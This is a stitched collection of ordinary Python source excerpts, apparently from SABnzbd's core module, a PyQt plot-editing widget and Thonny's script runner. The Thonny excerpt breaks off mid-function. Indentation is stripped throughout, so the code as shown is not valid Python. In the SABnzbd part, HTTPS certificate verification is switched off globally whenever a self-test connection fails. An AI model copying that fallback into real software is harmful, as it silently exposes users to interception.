# Remove connection info for faster restart
del_connection_info()
# Leave the harder restarts to the polling in SABnzbd.py
if hasattr(sys, "frozen"):
sabnzbd.TRIGGER_RESTART = True
else:
# Do the restart right now
cherrypy.engine._do_execv()
##############################################################################
# Misc Wrappers
##############################################################################
def new_limit():
""" Callback for article cache changes """
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
def guard_restart():
""" Callback for config options requiring a restart """
global RESTART_REQ
sabnzbd.RESTART_REQ = True
def guard_top_only():
""" Callback for change of top_only option """
NzbQueue.do.set_top_only(cfg.top_only())
def guard_pause_on_pp():
""" Callback for change of pause-download-on-pp """
if cfg.pause_on_post_processing():
pass # Not safe to idle downloader, because we don't know
# if post-processing is active now
else:
Downloader.do.resume_from_postproc()
def guard_quota_size():
""" Callback for change of quota_size """
BPSMeter.do.change_quota()
def guard_quota_dp():
""" Callback for change of quota_day or quota_period """
scheduler.restart(force=True)
def guard_language():
""" Callback for change of the interface language """
sabnzbd.lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
def set_https_verification(value):
""" Set HTTPS-verification state while returning current setting
False = disable verification
"""
prev = ssl._create_default_https_context == ssl.create_default_context
if value:
ssl._create_default_https_context = ssl.create_default_context
else:
ssl._create_default_https_context = ssl._create_unverified_context
return prev
def guard_https_ver():
""" Callback for change of https verification """
set_https_verification(cfg.enable_https_verification())
def add_url(url, pp=None, script=None, cat=None, priority=None, nzbname=None):
""" Add NZB based on a URL, attributes optional """
if "http" not in url:
return
if not pp or pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
logging.info("Fetching %s", url)
# Add feed name if it came from RSS
msg = T("Trying to fetch NZB from %s") % url
if nzbname:
msg = "%s - %s" % (nzbname, msg)
# Generate the placeholder
future_nzo = NzbQueue.do.generate_future(msg, pp, script, cat, url=url, priority=priority, nzbname=nzbname)
URLGrabber.do.add(url, future_nzo)
return future_nzo.nzo_id
def save_state():
""" Save all internal bookkeeping to disk """
ArticleCache.do.flush_articles()
NzbQueue.do.save()
BPSMeter.do.save()
rss.save()
Rating.do.save()
DirScanner.do.save()
PostProcessor.do.save()
def pause_all():
""" Pause all activities than cause disk access """
global PAUSED_ALL
PAUSED_ALL = True
Downloader.do.pause()
logging.debug("PAUSED_ALL active")
def unpause_all():
""" Resume all activities """
global PAUSED_ALL
PAUSED_ALL = False
Downloader.do.resume()
logging.debug("PAUSED_ALL inactive")
##############################################################################
# NZB Saving Methods
##############################################################################
def backup_exists(filename):
""" Return True if backup exists and no_dupes is set """
path = cfg.nzb_backup_dir.get_path()
return path and os.path.exists(os.path.join(path, filename + ".gz"))
def backup_nzb(filename, data):
""" Backup NZB file """
path = cfg.nzb_backup_dir.get_path()
if path:
save_compressed(path, filename, data)
def save_compressed(folder, filename, data):
""" Save compressed NZB file in folder """
if filename.endswith(".nzb"):
filename += ".gz"
else:
filename += ".nzb.gz"
logging.info("Backing up %s", os.path.join(folder, filename))
try:
# Have to get around the path being put inside the tgz
with open(os.path.join(folder, filename), "wb") as tgz_file:
f = gzip.GzipFile(filename, fileobj=tgz_file)
f.write(encoding.utob(data))
f.flush()
f.close()
except:
logging.error(T("Saving %s failed"), os.path.join(folder, filename))
logging.info("Traceback: ", exc_info=True)
##############################################################################
# Unsynchronized methods
##############################################################################
def add_nzbfile(
nzbfile,
pp=None,
script=None,
cat=None,
catdir=None,
priority=NORMAL_PRIORITY,
nzbname=None,
nzo_info=None,
url=None,
keep=None,
reuse=None,
password=None,
nzo_id=None,
):
""" Add file, either a single NZB-file or an archive.
All other parameters are passed to the NZO-creation.
"""
if pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
if isinstance(nzbfile, str):
# File coming from queue repair or local file-path
path = nzbfile
filename = os.path.basename(path)
keep_default = True
if not sabnzbd.WIN32:
# If windows client sends file to Unix server backslashes may
# be included, so convert these
path = path.replace("\\", "/")
logging.info("Attempting to add %s [%s]", filename, path)
else:
# File from file-upload object
# CherryPy mangles unicode-filenames: https://github.com/cherrypy/cherrypy/issues/1766
filename = encoding.correct_unknown_encoding(nzbfile.filename)
logging.info("Attempting to add %s", filename)
keep_default = False
try:
# We have to create a copy, because we can't re-use the CherryPy temp-file
# Just to be sure we add the extension to detect file type later on
nzb_temp_file, path = tempfile.mkstemp(suffix=filesystem.get_ext(filename))
os.write(nzb_temp_file, nzbfile.file.read())
os.close(nzb_temp_file)
except OSError:
logging.error(T("Cannot create temp file for %s"), filename)
logging.info("Traceback: ", exc_info=True)
return None
# Externally defined if we should keep the file?
if keep is None:
keep = keep_default
if filesystem.get_ext(filename) in VALID_ARCHIVES:
return nzbparser.process_nzb_archive_file(
filename,
path=path,
pp=pp,
script=script,
cat=cat,
catdir=catdir,
priority=priority,
nzbname=nzbname,
keep=keep,
reuse=reuse,
nzo_info=nzo_info,
url=url,
password=password,
nzo_id=nzo_id,
)
else:
return nzbparser.process_single_nzb(
filename,
path=path,
pp=pp,
script=script,
cat=cat,
catdir=catdir,
priority=priority,
nzbname=nzbname,
keep=keep,
reuse=reuse,
nzo_info=nzo_info,
url=url,
password=password,
nzo_id=nzo_id,
)
def enable_server(server):
""" Enable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(1)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def disable_server(server):
""" Disable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(0)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def system_shutdown():
""" Shutdown system after halting download and saving bookkeeping """
logging.info("Performing system shutdown")
Thread(target=halt).start()
while __INITIALIZED__:
time.sleep(1.0)
if sabnzbd.WIN32:
powersup.win_shutdown()
elif DARWIN:
powersup.osx_shutdown()
else:
powersup.linux_shutdown()
def system_hibernate():
""" Hibernate system """
logging.info("Performing system hybernation")
if sabnzbd.WIN32:
powersup.win_hibernate()
elif DARWIN:
powersup.osx_hibernate()
else:
powersup.linux_hibernate()
def system_standby():
""" Standby system """
logging.info("Performing system standby")
if sabnzbd.WIN32:
powersup.win_standby()
elif DARWIN:
powersup.osx_standby()
else:
powersup.linux_standby()
def shutdown_program():
""" Stop program after halting and saving """
if not sabnzbd.SABSTOP:
logging.info("[%s] Performing SABnzbd shutdown", misc.caller_name())
sabnzbd.halt()
cherrypy.engine.exit()
sabnzbd.SABSTOP = True
def restart_program():
""" Restart program (used by scheduler) """
logging.info("Scheduled restart request")
# Just set the stop flag, because stopping CherryPy from
# the scheduler is not reliable
sabnzbd.TRIGGER_RESTART = True
def change_queue_complete_action(action, new=True):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
When "new" is False, check whether non-script actions are acceptable
"""
global QUEUECOMPLETE, QUEUECOMPLETEACTION, QUEUECOMPLETEARG
_action = None
_argument = None
if "script_" in action:
# all scripts are labeled script_xxx
_action = run_script
_argument = action.replace("script_", "")
elif new or cfg.queue_complete_pers.get():
if action == "shutdown_pc":
_action = system_shutdown
elif action == "hibernate_pc":
_action = system_hibernate
elif action == "standby_pc":
_action = system_standby
elif action == "shutdown_program":
_action = shutdown_program
else:
action = None
else:
action = None
if new:
cfg.queue_complete.set(action or "")
config.save_config()
# keep the name of the action for matching the current select in queue.tmpl
QUEUECOMPLETE = action
QUEUECOMPLETEACTION = _action
QUEUECOMPLETEARG = _argument
def run_script(script):
""" Run a user script (queue complete only) """
command = [os.path.join(cfg.script_dir.get_path(), script)]
if os.path.exists(command[0]):
try:
stup, need_shell, command, creationflags = sabnzbd.newsunpack.build_command(command)
logging.info("Spawning external command %s", command)
subprocess.Popen(
command,
shell=need_shell,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=stup,
creationflags=creationflags,
)
except:
logging.debug("Failed script %s, Traceback: ", script, exc_info=True)
def empty_queues():
""" Return True if queues empty or non-existent """
global __INITIALIZED__
return (not __INITIALIZED__) or (PostProcessor.do.empty() and NzbQueue.do.is_empty())
def keep_awake():
""" If we still have work to do, keep Windows/OSX system awake """
if KERNEL32 or FOUNDATION:
if sabnzbd.cfg.keep_awake():
ES_CONTINUOUS = 0x80000000
ES_SYSTEM_REQUIRED = 0x00000001
if (not Downloader.do.is_paused() and not NzbQueue.do.is_empty()) or (
not PostProcessor.do.paused and not PostProcessor.do.empty()
):
if KERNEL32:
# Set ES_SYSTEM_REQUIRED until the next call
KERNEL32.SetThreadExecutionState(ES_CONTINUOUS | ES_SYSTEM_REQUIRED)
else:
sleepless.keep_awake("SABnzbd is busy downloading and/or post-processing")
else:
if KERNEL32:
# Allow the regular state again
KERNEL32.SetThreadExecutionState(ES_CONTINUOUS)
else:
sleepless.allow_sleep()
################################################################################
# Data IO #
################################################################################
def get_new_id(prefix, folder, check_list=None):
""" Return unique prefixed admin identifier within folder
optionally making sure that id is not in the check_list.
"""
for n in range(100):
try:
if not os.path.exists(folder):
os.makedirs(folder)
fd, path = tempfile.mkstemp("", "SABnzbd_%s_" % prefix, folder)
os.close(fd)
head, tail = os.path.split(path)
if not check_list or tail not in check_list:
return tail
except:
logging.error(T("Failure in tempfile.mkstemp"))
logging.info("Traceback: ", exc_info=True)
break
# Cannot create unique id, crash the process
raise IOError
def save_data(data, _id, path, do_pickle=True, silent=False):
""" Save data to a diskfile """
if not silent:
logging.debug("[%s] Saving data for %s in %s", misc.caller_name(), _id, path)
path = os.path.join(path, _id)
# We try 3 times, to avoid any dict or access problems
for t in range(3):
try:
with open(path, "wb") as data_file:
if do_pickle:
pickle.dump(data, data_file, protocol=pickle.HIGHEST_PROTOCOL)
else:
data_file.write(data)
break
except:
if silent:
# This can happen, probably a removed folder
pass
elif t == 2:
logging.error(T("Saving %s failed"), path)
logging.info("Traceback: ", exc_info=True)
else:
# Wait a tiny bit before trying again
time.sleep(0.1)
def load_data(data_id, path, remove=True, do_pickle=True, silent=False):
""" Read data from disk file """
path = os.path.join(path, data_id)
if not os.path.exists(path):
logging.info("[%s] %s missing", misc.caller_name(), path)
return None
if not silent:
logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id, path)
try:
with open(path, "rb") as data_file:
if do_pickle:
try:
data = pickle.load(data_file, encoding=sabnzbd.encoding.CODEPAGE)
except UnicodeDecodeError:
# Could be Python 2 data that we can load using old encoding
data = pickle.load(data_file, encoding="latin1")
else:
data = data_file.read()
if remove:
filesystem.remove_file(path)
except:
logging.error(T("Loading %s failed"), path)
logging.info("Traceback: ", exc_info=True)
return None
return data
def remove_data(_id, path):
""" Remove admin file """
path = os.path.join(path, _id)
try:
if os.path.exists(path):
filesystem.remove_file(path)
except:
logging.debug("Failed to remove %s", path)
def save_admin(data, data_id):
""" Save data in admin folder in specified format """
logging.debug("[%s] Saving data for %s", misc.caller_name(), data_id)
save_data(data, data_id, cfg.admin_dir.get_path())
def load_admin(data_id, remove=False, silent=False):
""" Read data in admin folder in specified format """
logging.debug("[%s] Loading data for %s", misc.caller_name(), data_id)
return load_data(data_id, cfg.admin_dir.get_path(), remove=remove, silent=silent)
def request_repair():
""" Request a full repair on next restart """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
try:
with open(path, "w") as f:
f.write("\n")
except:
pass
def check_repair_request():
""" Return True if repair request found, remove afterwards """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
if os.path.exists(path):
try:
filesystem.remove_file(path)
except:
pass
return True
return False
def check_all_tasks():
""" Check every task and restart safe ones, else restart program
Return True when everything is under control
"""
if __SHUTTING_DOWN__ or not __INITIALIZED__:
return True
# Non-restartable threads, require program restart
if not sabnzbd.PostProcessor.do.is_alive():
logging.info("Restarting because of crashed postprocessor")
return False
if not Downloader.do.is_alive():
logging.info("Restarting because of crashed downloader")
return False
if not Decoder.do.is_alive():
logging.info("Restarting because of crashed decoder")
return False
if not Assembler.do.is_alive():
logging.info("Restarting because of crashed assembler")
return False
# Kick the downloader, in case it missed the semaphore
Downloader.do.wakeup()
# Make sure the right servers are active
Downloader.do.check_timers()
# Restartable threads
if not DirScanner.do.is_alive():
logging.info("Restarting crashed dirscanner")
DirScanner.do.__init__()
if not URLGrabber.do.is_alive():
logging.info("Restarting crashed urlgrabber")
URLGrabber.do.__init__()
if not Rating.do.is_alive():
logging.info("Restarting crashed rating")
Rating.do.__init__()
if not sabnzbd.scheduler.sched_check():
logging.info("Restarting crashed scheduler")
sabnzbd.scheduler.init()
sabnzbd.downloader.Downloader.do.unblock_all()
# Check one-shot pause
sabnzbd.scheduler.pause_check()
# Check (and terminate) idle jobs
sabnzbd.nzbqueue.NzbQueue.do.stop_idle_jobs()
return True
def pid_file(pid_path=None, pid_file=None, port=0):
""" Create or remove pid file """
global DIR_PID
if not sabnzbd.WIN32:
if pid_path and pid_path.startswith("/"):
DIR_PID = os.path.join(pid_path, "sabnzbd-%d.pid" % port)
elif pid_file and pid_file.startswith("/"):
DIR_PID = pid_file
if DIR_PID:
try:
if port:
with open(DIR_PID, "w") as f:
f.write("%d\n" % os.getpid())
else:
filesystem.remove_file(DIR_PID)
except:
logging.warning("Cannot access PID file %s", DIR_PID)
def check_incomplete_vs_complete():
""" Make sure "incomplete" and "complete" are not identical """
complete = cfg.complete_dir.get_path()
if filesystem.same_file(cfg.download_dir.get_path(), complete):
if filesystem.real_path("X", cfg.download_dir()) == cfg.download_dir():
# Abs path, so set an abs path too
cfg.download_dir.set(os.path.join(complete, "incomplete"))
else:
cfg.download_dir.set("incomplete")
def wait_for_download_folder():
""" Wait for download folder to become available """
while not cfg.download_dir.test_path():
logging.debug('Waiting for "incomplete" folder')
time.sleep(2.0)
# Required wrapper because nzbstuff.py cannot import downloader.py
def highest_server(me):
return sabnzbd.downloader.Downloader.do.highest_server(me)
def test_ipv6():
""" Check if external IPv6 addresses are reachable """
if not cfg.selftest_host():
# User disabled the test, assume active IPv6
return True
try:
info = getipaddress.addresslookup6(cfg.selftest_host())
except:
logging.debug(
"Test IPv6: Disabling IPv6, because it looks like it's not available. Reason: %s", sys.exc_info()[0]
)
return False
try:
af, socktype, proto, canonname, sa = info[0]
with socket.socket(af, socktype, proto) as sock:
sock.settimeout(2) # 2 second timeout
sock.connect(sa[0:2])
logging.debug("Test IPv6: IPv6 test successful. Enabling IPv6")
return True
except socket.error:
logging.debug("Test IPv6: Cannot reach IPv6 test host. Disabling IPv6")
return False
except:
logging.debug("Test IPv6: Problem during IPv6 connect. Disabling IPv6. Reason: %s", sys.exc_info()[0])
return False
def test_cert_checking():
""" Test quality of certificate validation """
# User disabled the test, assume proper SSL certificates
if not cfg.selftest_host():
return True
# Try a connection to our test-host
try:
ctx = ssl.create_default_context()
base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ctx.wrap_socket(base_sock, server_hostname=cfg.selftest_host())
ssl_sock.settimeout(2.0)
ssl_sock.connect((cfg.selftest_host(), 443))
ssl_sock.close()
return True
except (socket.gaierror, socket.timeout):
# Non-SSL related error.
# We now assume that certificates work instead of forcing
# lower quality just because some (temporary) internet problem
logging.info("Could not determine system certificate validation quality due to connection problems")
return True
except:
# Seems something is still wrong
sabnzbd.set_https_verification(False)
return False
def history_updated():
""" To make sure we always have a fresh history """
sabnzbd.LAST_HISTORY_UPDATE += 1
# Never go over the limit
if sabnzbd.LAST_HISTORY_UPDATE + 1 >= sys.maxsize:
sabnzbd.LAST_HISTORY_UPDATE = 1
|
edit.py
|
"""The module that contains the plot edit partent widget."""
import logging
import threading
from matplotlib import pyplot as plt
from PyQt5.QtWidgets import (QComboBox, QHBoxLayout, QPushButton, QVBoxLayout,
QWidget)
from views.plot import Plot
log = logging.getLogger(__name__)
class PlotEdit(QWidget):
"""
Class that builds the parent plot editing widget.
"""
def __init__(self, plot_window=None):
super().__init__()
self.left = 150
self.top = 150
self.width = 1080
self.height = 720
self.line_box = QComboBox()
self.select_plot()
self.init_ui()
self.check_for_plots_thread = threading.Thread(target=self.check_for_plots())
self.check_for_plots_thread.daemon = True
self.check_for_plots_thread.start()
def init_ui(self):
"""Initialize the Edit Widget"""
plot_window_button = QPushButton('Select Plot Window', self)
plot_window_button.clicked.connect(self.select_plot)
plot_button = QPushButton('Plot Data', self)
plot_button.clicked.connect(self.plot)
color_button = QPushButton('Change Color', self)
color_button.clicked.connect(lambda: self.plot_window.color_change(self.line_box))
style_button = QPushButton('Change Style', self)
style_button.clicked.connect(lambda: self.plot_window.line_style_change(self.line_box))
remove_button = QPushButton('Remove Plot', self)
remove_button.clicked.connect(lambda: self.plot_window.remove_plot(self.line_box))
button_vertical_box = QVBoxLayout()
button_vertical_box.addWidget(self.line_box)
button_vertical_box.addStretch(1)
button_vertical_box.addWidget(plot_window_button)
button_vertical_box.addWidget(color_button)
button_vertical_box.addWidget(style_button)
button_vertical_box.addWidget(plot_button)
button_vertical_box.addWidget(remove_button)
main_horizontal_box = QHBoxLayout()
main_horizontal_box.addLayout(button_vertical_box)
self.setLayout(main_horizontal_box)
self.setGeometry(self.left, self.top, self.width, self.height)
def check_for_plots(self):
open_plots = Plot.get_plot_instances()
for plot in open_plots:
self.line_box.addItem(plot)
def get_line_box(self):
"""Returns the combo box for referencing the currently selected line."""
return self.line_box
def select_plot(self):
"""Function to select the plot to modify."""
open_plots = Plot.get_plot_instances()
log.warning("select_plot called.")
if not open_plots:
#No Open Plots: Create a new one
pass
elif len(open_plots) == 1:
#Only one plot open, pick that one
self.plot_window = open_plots[0]
else:
#Multiple plots open, hadle that case.
pass
def plot(self):
"""Wrapper around the plot function in the Plot class."""
self.plot_window.plot(self.get_line_box())
self.plot_window.show()
|
running.py
|
# -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
from logging import getLogger
import os.path
import re
import shlex
import signal
import subprocess
import traceback
import sys
import time
import tkinter as tk
import warnings
from logging import debug
from threading import Thread
from time import sleep
from tkinter import messagebox, ttk
from typing import Any, List, Optional, Set, Union, Callable # @UnusedImport; @UnusedImport
import thonny
from thonny import THONNY_USER_DIR, common, get_runner, get_shell, get_workbench
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
EOFCommand,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
is_same_path,
normpath_with_actual_case,
parse_message,
path_startswith,
serialize_message,
update_system_path,
MessageFromBackend,
universal_relpath,
read_one_incoming_message_str,
InlineResponse,
)
from thonny.editors import (
get_current_breakpoints,
get_saved_current_script_filename,
is_remote_path,
is_local_path,
get_target_dirname_from_editor_filename,
extract_target_path,
)
from thonny.languages import tr
from thonny.misc_utils import (
construct_cmd_line,
inside_flatpak,
running_on_mac_os,
running_on_windows,
show_command_not_available_in_flatpak_message,
)
from thonny.ui_utils import CommonDialogEx, select_sequence, show_dialog
from thonny.workdlg import WorkDialog
logger = getLogger(__name__)
WINDOWS_EXE = "python.exe"
OUTPUT_MERGE_THRESHOLD = 1000
RUN_COMMAND_LABEL = "" # init later when gettext is ready
RUN_COMMAND_CAPTION = ""
EDITOR_CONTENT_TOKEN = "$EDITOR_CONTENT"
EXPECTED_TERMINATION_CODE = 123
INTERRUPT_SEQUENCE = "<Control-c>"
ANSI_CODE_TERMINATOR = re.compile("[@-~]")
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
_console_allocated = False
class Runner:
def __init__(self) -> None:
get_workbench().set_default("run.auto_cd", True)
self._init_commands()
self._state = "starting"
self._proxy = None # type: BackendProxy
self._publishing_events = False
self._polling_after_id = None
self._postponed_commands = [] # type: List[CommandToBackend]
def _remove_obsolete_jedi_copies(self) -> None:
# Thonny 2.1 used to copy jedi in order to make it available
# for the backend. Get rid of it now
for item in os.listdir(THONNY_USER_DIR):
if item.startswith("jedi_0."):
import shutil
shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
def start(self) -> None:
global _console_allocated
try:
self._check_alloc_console()
_console_allocated = True
except Exception:
logger.exception("Problem allocating console")
_console_allocated = False
self.restart_backend(False, True)
# temporary
self._remove_obsolete_jedi_copies()
def _init_commands(self) -> None:
global RUN_COMMAND_CAPTION, RUN_COMMAND_LABEL
RUN_COMMAND_LABEL = tr("Run current script")
RUN_COMMAND_CAPTION = tr("Run")
get_workbench().set_default("run.run_in_terminal_python_repl", False)
get_workbench().set_default("run.run_in_terminal_keep_open", True)
try:
import thonny.plugins.debugger # @UnusedImport
debugger_available = True
except ImportError:
debugger_available = False
get_workbench().add_command(
"run_current_script",
"run",
RUN_COMMAND_LABEL,
caption=RUN_COMMAND_CAPTION,
handler=self.cmd_run_current_script,
default_sequence="<F5>",
extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
tester=self.cmd_run_current_script_enabled,
group=10,
image="run-current-script",
include_in_toolbar=not (get_workbench().in_simple_mode() and debugger_available),
show_extra_sequences=True,
)
get_workbench().add_command(
"run_current_script_in_terminal",
"run",
tr("Run current script in terminal"),
caption="RunT",
handler=self._cmd_run_current_script_in_terminal,
default_sequence="<Control-t>",
extra_sequences=["<<CtrlTInText>>"],
tester=self._cmd_run_current_script_in_terminal_enabled,
group=35,
image="terminal",
)
get_workbench().add_command(
"restart",
"run",
tr("Stop/Restart backend"),
caption=tr("Stop"),
handler=self.cmd_stop_restart,
default_sequence="<Control-F2>",
group=100,
image="stop",
include_in_toolbar=True,
)
get_workbench().add_command(
"interrupt",
"run",
tr("Interrupt execution"),
handler=self._cmd_interrupt,
tester=self._cmd_interrupt_enabled,
default_sequence=INTERRUPT_SEQUENCE,
skip_sequence_binding=True, # Sequence will be bound differently
group=100,
bell_when_denied=False,
)
get_workbench().bind(INTERRUPT_SEQUENCE, self._cmd_interrupt_with_shortcut, True)
get_workbench().add_command(
"ctrld",
"run",
tr("Send EOF / Soft reboot"),
self.ctrld,
self.ctrld_enabled,
group=100,
default_sequence="<Control-d>",
extra_sequences=["<<CtrlDInText>>"],
)
get_workbench().add_command(
"disconnect",
"run",
tr("Disconnect"),
self.disconnect,
self.disconnect_enabled,
group=100,
)
def get_state(self) -> str:
"""State is one of "running", "waiting_debugger_command", "waiting_toplevel_command" """
return self._state
def _set_state(self, state: str) -> None:
if self._state != state:
logger.debug("Runner state changed: %s ==> %s" % (self._state, state))
self._state = state
def is_running(self):
return self._state == "running"
def is_waiting(self):
return self._state.startswith("waiting")
def is_waiting_toplevel_command(self):
return self._state == "waiting_toplevel_command"
def is_waiting_debugger_command(self):
return self._state == "waiting_debugger_command"
def get_sys_path(self) -> List[str]:
return self._proxy.get_sys_path()
def send_command(self, cmd: CommandToBackend) -> None:
if self._proxy is None:
return
if self._publishing_events:
# allow all event handlers to complete before sending the commands
# issued by first event handlers
self._postpone_command(cmd)
return
# First sanity check
if (
isinstance(cmd, ToplevelCommand)
and not self.is_waiting_toplevel_command()
and cmd.name not in ["Reset", "Run", "Debug"]
or isinstance(cmd, DebuggerCommand)
and not self.is_waiting_debugger_command()
):
get_workbench().bell()
logger.warning("RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state()))
return
# Attach extra info
if "debug" in cmd.name.lower():
cmd["breakpoints"] = get_current_breakpoints()
if "id" not in cmd:
cmd["id"] = generate_command_id()
cmd["local_cwd"] = get_workbench().get_local_cwd()
if self._proxy.running_inline_command and isinstance(cmd, InlineCommand):
self._postpone_command(cmd)
return
# Offer the command
logger.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
response = self._proxy.send_command(cmd)
if response == "discard":
return None
elif response == "postpone":
self._postpone_command(cmd)
return
else:
assert response is None
get_workbench().event_generate("CommandAccepted", command=cmd)
if isinstance(cmd, InlineCommand):
self._proxy.running_inline_command = True
if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
self._set_state("running")
if cmd.name[0].isupper():
# This may be only logical restart, which does not look like restart to the runner
get_workbench().event_generate("BackendRestart", full=False)
def send_command_and_wait(self, cmd: CommandToBackend, dialog_title: str) -> MessageFromBackend:
dlg = InlineCommandDialog(get_workbench(), cmd, title=dialog_title + " ...")
show_dialog(dlg)
return dlg.response
def _postpone_command(self, cmd: CommandToBackend) -> None:
# in case of InlineCommands, discard older same type command
if isinstance(cmd, InlineCommand):
for older_cmd in self._postponed_commands:
if older_cmd.name == cmd.name:
self._postponed_commands.remove(older_cmd)
if len(self._postponed_commands) > 10:
logger.warning("Can't pile up too many commands. This command will be just ignored")
else:
self._postponed_commands.append(cmd)
def _send_postponed_commands(self) -> None:
todo = self._postponed_commands
self._postponed_commands = []
for cmd in todo:
logger.debug("Sending postponed command: %s", cmd)
self.send_command(cmd)
def send_program_input(self, data: str) -> None:
assert self.is_running()
self._proxy.send_program_input(data)
def execute_script(
self,
script_path: str,
args: List[str],
working_directory: Optional[str] = None,
command_name: str = "Run",
) -> None:
if self._proxy.get_cwd() != working_directory:
# create compound command
# start with %cd
cd_cmd_line = construct_cd_command(working_directory) + "\n"
else:
# create simple command
cd_cmd_line = ""
rel_filename = universal_relpath(script_path, working_directory)
cmd_parts = ["%" + command_name, rel_filename] + args
exe_cmd_line = construct_cmd_line(cmd_parts, [EDITOR_CONTENT_TOKEN]) + "\n"
# submit to shell (shell will execute it)
get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
def execute_editor_content(self, command_name, args):
get_shell().submit_magic_command(
construct_cmd_line(
["%" + command_name, "-c", EDITOR_CONTENT_TOKEN] + args, [EDITOR_CONTENT_TOKEN]
)
)
def execute_current(self, command_name: str) -> None:
"""
This method's job is to create a command for running/debugging
current file/script and submit it to shell
"""
if not self.is_waiting_toplevel_command():
self.restart_backend(True, False, 2)
filename = get_saved_current_script_filename()
if not filename:
# user has cancelled file saving
return
if (
is_remote_path(filename)
and not self._proxy.can_run_remote_files()
or is_local_path(filename)
and not self._proxy.can_run_local_files()
):
self.execute_editor_content(command_name, self._get_active_arguments())
else:
if get_workbench().get_option("run.auto_cd") and command_name[0].isupper():
working_directory = get_target_dirname_from_editor_filename(filename)
else:
working_directory = self._proxy.get_cwd()
if is_local_path(filename):
target_path = filename
else:
target_path = extract_target_path(filename)
self.execute_script(
target_path, self._get_active_arguments(), working_directory, command_name
)
def _get_active_arguments(self):
if get_workbench().get_option("view.show_program_arguments"):
args_str = get_workbench().get_option("run.program_arguments")
get_workbench().log_program_arguments_string(args_str)
return shlex.split(args_str)
else:
return []
def cmd_run_current_script_enabled(self) -> bool:
return (
get_workbench().get_editor_notebook().get_current_editor() is not None
and "run" in get_runner().get_supported_features()
)
def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
return (
self._proxy
and "run_in_terminal" in self._proxy.get_supported_features()
and self.cmd_run_current_script_enabled()
)
def cmd_run_current_script(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.execute_current("Run")
def _cmd_run_current_script_in_terminal(self) -> None:
if inside_flatpak():
show_command_not_available_in_flatpak_message()
return
filename = get_saved_current_script_filename()
if not filename:
return
self._proxy.run_script_in_terminal(
filename,
self._get_active_arguments(),
get_workbench().get_option("run.run_in_terminal_python_repl"),
get_workbench().get_option("run.run_in_terminal_keep_open"),
)
def _cmd_interrupt(self) -> None:
if self._proxy is not None:
if _console_allocated:
self._proxy.interrupt()
else:
messagebox.showerror(
"No console",
"Can't interrupt as console was not allocated.\n\nUse Stop/Restart instead.",
master=self,
)
else:
logger.warning("User tried interrupting without proxy")
def _cmd_interrupt_with_shortcut(self, event=None):
if not self._cmd_interrupt_enabled():
return None
if not running_on_mac_os(): # on Mac Ctrl+C is not used for Copy.
# Disable Ctrl+C interrupt in editor and shell, when some text is selected
# (assuming user intended to copy instead of interrupting)
widget = get_workbench().focus_get()
if isinstance(widget, tk.Text):
if len(widget.tag_ranges("sel")) > 0:
# this test is reliable, unlike selection_get below
return None
elif isinstance(widget, (tk.Listbox, ttk.Entry, tk.Entry, tk.Spinbox)):
try:
selection = widget.selection_get()
if isinstance(selection, str) and len(selection) > 0:
# Assuming user meant to copy, not interrupt
# (IDLE seems to follow same logic)
# NB! This is not perfect, as in Linux the selection can be in another app
# ie. there may be no selection in Thonny actually.
# In other words, Ctrl+C interrupt may be dropped without reason
# when given inside the widgets listed above.
return None
except Exception:
# widget either doesn't have selection_get or it
# gave error (can happen without selection on Ubuntu)
pass
self._cmd_interrupt()
return "break"
def _cmd_interrupt_enabled(self) -> bool:
return self._proxy and self._proxy.is_connected()
def cmd_stop_restart(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.restart_backend(True)
def disconnect(self):
proxy = self.get_backend_proxy()
assert hasattr(proxy, "disconnect")
proxy.disconnect()
def disconnect_enabled(self):
return hasattr(self.get_backend_proxy(), "disconnect")
def ctrld(self):
proxy = self.get_backend_proxy()
if not proxy:
return
if get_shell().has_pending_input():
messagebox.showerror(
"Can't perform this action",
"Ctrl+D only has effect on an empty line / prompt.\n"
+ "Submit current input (press ENTER) and try again",
master=self,
)
return
proxy.send_command(EOFCommand())
self._set_state("running")
def ctrld_enabled(self):
proxy = self.get_backend_proxy()
return proxy and proxy.is_connected()
def _poll_backend_messages(self) -> None:
"""I chose polling instead of event_generate in listener thread,
because event_generate across threads is not reliable
http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
"""
self._polling_after_id = None
if self._pull_backend_messages() is False:
return
self._polling_after_id = get_workbench().after(20, self._poll_backend_messages)
def _pull_backend_messages(self):
# Don't process too many messages in single batch, allow screen updates
# and user actions between batches.
# Mostly relevant when backend prints a lot quickly.
msg_count = 0
max_msg_count = 10
while self._proxy is not None and msg_count < max_msg_count:
try:
msg = self._proxy.fetch_next_message()
if not msg:
break
# logger.debug(
